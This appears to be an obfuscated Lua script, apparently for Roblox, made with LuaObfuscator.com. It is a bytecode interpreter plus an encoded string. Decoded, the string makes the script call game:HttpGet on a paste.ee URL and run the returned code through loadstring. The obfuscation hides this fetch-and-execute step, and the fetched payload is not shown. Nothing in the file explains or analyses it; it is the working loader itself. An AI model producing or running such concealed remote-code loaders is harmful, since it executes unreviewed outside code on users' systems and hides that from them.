--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v91=0;local v92;while true do if (v91==1) then return v92;end if (v91==0) then v92=v5(v82,v19);v19=nil;v91=1;end end else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=0 -0 ;local v84;while true do if (v83==(0 -0)) then v84=(v31/((3 -1)^(v32-((2 -0) -1))))%((621 -(555 + 64))^(((v33-(932 -(857 + 74))) -(v32-(569 -(367 + (1266 -(68 + 997)))))) + 1)) ;return v84-(v84%(928 -((1484 -(226 + 1044)) + 713))) ;end end else local v85=0 + 0 ;local v86;while true do if (v85==(0 -0)) then v86=(1 + 1)^(v32-((995 -(32 + 85)) -(282 + 595))) ;return (((v31%(v86 + v86))>=v86) and (1638 -(1523 + 114))) or (0 + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 2 ;return (v36 * (57 + 199)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + 3 );v18=v18 + (961 -(892 + 65)) ;return (v40 * ((40022913 -(87 + 263)) -23245347)) + (v39 * (121138 -55602)) + (v38 * (469 -213)) + v37 ;end local function v24() local v41=180 -((226 -159) + 113) ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(3 -2)) then v44=19 -(10 + 8) ;v45=(v20(v43,3 -2 ,(71 -56) + 5 ) * ((4 -2)^(24 + 8))) + v42 ;v41=7 -5 ;end if (v41==(955 -(802 + 150))) then if (v46==(430 -(44 + 386))) then if (v45==(1486 -(998 + 488))) then return v47 * (0 -(0 + 0)) ;else v46=1 -0 ;v44=0 + 0 ;end elseif (v46==(3044 -(915 + 82))) then return ((v45==(0 -0)) and (v47 * ((2 -1)/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(1344 -(2068 -(760 + 987))) ) * (v44 + (v45/((1915 -(1789 + 124))^(1239 -((1835 -(745 + 21)) + 118))))) ;end if (v41==(0 -0)) then v42=v23();v43=v23();v41=1 -0 ;end if (v41==(1 + 1)) then v46=v20(v43,3 + 5 + 13 ,6 + 25 );v47=((v20(v43,56 -24 )==(1 + 0)) and  -(1081 -(1020 + 60))) or 1 ;v41=794 -(368 + 423) ;end end end local function v25(v48) local v49;if  not v48 then local v87=0 -0 ;while true do if (v87==0) then v48=v23();if (v48==(0 -0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -((1056 -(87 + 968)) + 0) );v18=v18 + v48 ;local v50={};for v65=1 + 0 , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 654 -(132 + 522) ;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do local v67=(function() return 0 -0 ;end)();while true do if (v67~=(1384 -(746 + 638))) then else if (v51==(1 + 0)) then local v97=(function() return 0;end)();local v98=(function() return;end)();while true do if (v97==0) then v98=(function() return 0 -0 ;end)();while true do if (v98==0) then v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v98=(function() return 1;end)();end if (v98~=1) then else v57=(function() return v23();end)();v51=(function() return 343 -(218 + 123) ;end)();break;end end break;end end end if (v51==(1584 -(1535 + 46))) then for v102= #"~",v23() do local v103=(function() return v21();end)();if (v20(v103, #" ", #":")~=(0 + 0)) then else local v105=(function() return 0 + 0 ;end)();local v106=(function() return;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();while true do if (0==v105) then local v147=(function() return 0;end)();while true do if (v147==(560 -(306 + 254))) then v106=(function() return 0 + 0 ;end)();v107=(function() return nil;end)();v147=(function() return 1;end)();end if (v147~=1) then else v105=(function() return 1 -0 ;end)();break;end end end if (v105==1) then local v148=(function() return 1467 -(899 + 568) ;end)();while true do if (v148~=(0 + 0)) then else v108=(function() return nil;end)();v109=(function() return nil;end)();v148=(function() return 1;end)();end if (v148==(2 -1)) then v105=(function() return 605 -(268 + 335) ;end)();break;end end end if (v105==2) then while true do if (v106==(292 -(60 + 230))) then local v166=(function() return 572 -(426 + 146) ;end)();local v167=(function() return;end)();while true do if (v166~=(0 + 0)) then else v167=(function() return 1456 -(282 + 1174) ;end)();while true do if ((811 -(569 + 242))==v167) then if (v20(v108, #"[", #"~")~= #"]") then else v109[2]=(function() return v58[v109[2]];end)();end if (v20(v108,5 -3 ,1 + 1 )== #"~") then v109[ #"asd"]=(function() return v58[v109[ #"19("]];end)();end v167=(function() return 1;end)();end if (v167==(1025 -(706 + 318))) then v106=(function() return  #"nil";end)();break;end end break;end end end if (v106~= #"}") then else local v168=(function() return 0;end)();local v169=(function() return;end)();while true do if (v168~=0) then else v169=(function() return 0;end)();while true do if (v169==(1252 -(721 + 530))) then v106=(function() return 2;end)();break;end if (v169==(1271 -(945 + 326))) then v109=(function() return {v22(),v22(),nil,nil};end)();if (v107==(0 + 0)) then local v181=(function() return 700 -(271 + 429) ;end)();local v182=(function() return;end)();while true do if (v181==0) then v182=(function() return 0;end)();while true do if (v182==(0 + 0)) then v109[ #"xnx"]=(function() return v22();end)();v109[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v107== #"[") then v109[ #"19("]=(function() return v23();end)();elseif (v107==2) then v109[ #"nil"]=(function() return v23() -((1502 -(1408 + 92))^(1102 -(461 + 625))) ;end)();elseif (v107~= #"-19") then else local v187=(function() return 1288 -(993 + 295) ;end)();local v188=(function() return;end)();while true do if (v187==0) then v188=(function() return 0;end)();while true do if (v188~=(0 + 0)) then else v109[ #"xnx"]=(function() return v23() -((1173 -(418 + 753))^16) ;end)();v109[ #"asd1"]=(function() return v22();end)();break;end end break;end end end v169=(function() return 1 + 0 ;end)();end end break;end end end if ((0 + 0)==v106) then local v170=(function() return 0;end)();local v171=(function() return;end)();while true do if (v170==(0 + 0)) then v171=(function() return 0;end)();while true do if (v171~=(1 + 0)) then else v106=(function() return  #"[";end)();break;end if (v171==(529 -(406 + 123))) then v107=(function() return v20(v103,1771 -(1749 + 20) , #"91(");end)();v108=(function() return v20(v103, #".dev",2 + 4 );end)();v171=(function() return 1;end)();end end break;end end end if (v106~= #"-19") then else if (v20(v108, #"gha", #"xxx")== #"<") then v109[ #".com"]=(function() return v58[v109[ #"http"]];end)();end v53[v102]=(function() return v109;end)();break;end end break;end end end end for v104= #">",v23() do v54,v104,v28=(function() return v52(v54,v104,v28);end)();end return v56;end v67=(function() return 1323 -(1249 + 73) ;end)();end if (v67==1) then if (0==v51) then local v99=(function() return 0;end)();while true do if (v99~=1) then else v54=(function() return {};end)();v51=(function() return 1 + 0 ;end)();break;end if (v99==(1145 -(466 + 679))) then v52=(function() return function(v141,v142,v143) local v144=(function() return 0 -0 ;end)();while true do if (v144~=0) then else local v161=(function() return 0 -0 ;end)();while true do if (0==v161) then v141[v142-#"]" ]=(function() return v143();end)();return v141,v142,v143;end end end end end;end)();v53=(function() return {};end)();v99=(function() return 1;end)();end end end if (v51~=(1902 -(106 + 1794))) then else local v100=(function() return 0;end)();local v101=(function() return;end)();while true do if (v100==0) then v101=(function() return 0;end)();while true do if (v101~=0) then else v58=(function() return {};end)();for v150= #",",v57 do local v151=(function() return 0;end)();local v152=(function() return;end)();local v153=(function() return;end)();local v154=(function() return;end)();while true do if (v151~=(0 + 0)) then else v152=(function() return 0 + 0 ;end)();v153=(function() return nil;end)();v151=(function() return 1;end)();end if (v151==1) then v154=(function() return nil;end)();while true do if ((0 -0)==v152) then local v177=(function() return 0 -0 ;end)();while true do if (v177~=1) then else v152=(function() return 1;end)();break;end if (0==v177) then v153=(function() return v21();end)();v154=(function() return nil;end)();v177=(function() return 1;end)();end end end if (v152==(115 -(4 + 110))) then if (v153== #":") then v154=(function() return v21()~=(584 -(57 + 527)) ;end)();elseif (v153==2) then v154=(function() return v24();end)();elseif (v153== #"-19") then v154=(function() return v25();end)();end v58[v150]=(function() return v154;end)();break;end end break;end end end v101=(function() return 1428 -(41 + 1386) ;end)();end if (v101~=(104 -(17 + 86))) then else v56[ #"xnx"]=(function() return v21();end)();v51=(function() return 3 + 0 ;end)();break;end end break;end end end break;end end end end local function v29(v59,v60,v61) local v62=v59[1 -0 ];local v63=v59[(15 -10) -3 ];local v64=v59[169 -(122 + 44) ];return function(...) local v68=v62;local v69=v63;local v70=v64;local v71=v27;local v72=(1 + 0) -0 ;local v73= -(3 -2);local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v88=(1130 -(369 + 761)) + 0 ,v76 do if (v88>=v70) then v74[v88-v70 ]=v75[v88 + (1 -0) ];else v78[v88]=v75[v88 + (66 -(30 + 35)) ];end end local v79=(v76-v70) + 1 + 0 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1258 -((3018 -(1913 + 62)) + 214) ];if ((2350>1155) and (v81<=(26 -19))) then if (v81<=3) then if ((4029<=4853) and (v81<=((764 + 449) -(323 + 889)))) then if ((v81>((0 -0) -0)) or (516>3434)) then local v110=(336 + 244) -(361 + (2152 -(565 + 1368))) ;local v111;local v112;local v113;local v114;while true do if ((321 -(53 + 267))==v110) then v73=(v113 + v111) -(1 + 0) ;v114=413 -(15 + 398) ;v110=(1786 -802) -(18 + 964) ;end if (v110==2) then for v162=v111,v73 do local v163=0;while true do if ((0 -0)==v163) then v114=v114 + 1 + 0 ;v78[v162]=v112[v114];break;end end end break;end if ((4046>=3033) and (v110==(0 + 0))) then v111=v80[852 -(20 + 830) ];v112,v113=v71(v78[v111](v13(v78,v111 + (1 -0) + 0 ,v80[129 -(116 + 10) ])));v110=1 + 0 ;end end else do return;end end elseif (v81==((2401 -(1477 + 184)) -(542 + 196))) then v78[v80[2]]={};else v78[v80[2]]=v80[6 -3 ];end elseif ((v81<=(2 + 3)) or (2719<=1447)) then if (v81>(3 + 1)) then v78[v80[1 + 1 ]]={};else local v119=v80[4 -2 ];local v120=v78[v80[241 -(64 + 174) ]];v78[v119 + ((2 -0) -(1 + 0)) ]=v120;v78[v119]=v120[v80[(2302 -747) -(1050 + 76 + 425) ]];end elseif (v81>(411 -((974 -(564 + 292)) + 287))) then v78[v80[(343 -(144 + 192)) -5 ]]=v61[v80[4 -1 ]];else local v126=v80[2];v78[v126]=v78[v126](v13(v78,v126 + (1122 -(118 + 1003)) ,v73));end elseif ((v81<=(32 -21)) or (4134<3926)) then if (v81<=(386 -(142 + 235))) then if (v81>8) then v78[v80[9 -7 ]]=v80[3];else v78[v80[2]]=v61[v80[1 + 2 ]];end elseif (v81==((2974 -1987) -(553 + 424))) then v78[v80[3 -1 ]]();else local v132=0 + 0 ;local v133;local v134;while true do if ((v132==(1 + 0)) or (164>=2785)) then v78[v133 + 1 + 0 ]=v134;v78[v133]=v134[v80[2 + (218 -(42 + 174)) ]];break;end if ((v132==(0 + 0)) or (525==2109)) then v133=v80[2];v134=v78[v80[6 -3 ]];v132=2 -1 ;end end end elseif (v81<=(29 -(13 + 3))) then if (v81==(4 + 8)) then local v135=v80[9 -7 ];v78[v135]=v78[v135](v13(v78,v135 + (754 -(184 + 55 + 514)) ,v73));else v78[v80[1 + 1 + 0 ]]();end elseif ((33==33) and (v81==(1343 -(797 + 227 + 305)))) then local v137=v80[2];local v138,v139=v71(v78[v137](v13(v78,v137 + 1 ,v80[3 + 0 ])));v73=(v139 + v137) -(1 + (1504 -(363 + 1141))) ;local v140=0 -0 ;for v145=v137,v73 do local v146=1202 -(373 + 829) ;while true do if ((1580 -(1183 + 397))==v146) then v140=v140 + 1 ;v78[v145]=v138[v140];break;end end end else do return;end end v72=v72 + (732 -(476 + 255)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574031B3Q00682Q7470733A2Q2F70617374652E2Q652F722F5A7655743543413500094Q00027Q001208000100013Q001208000200023Q002004000200020003001209000400044Q000E000200044Q000600013Q00022Q000D0001000100012Q000F3Q00017Q00",v9(),...);
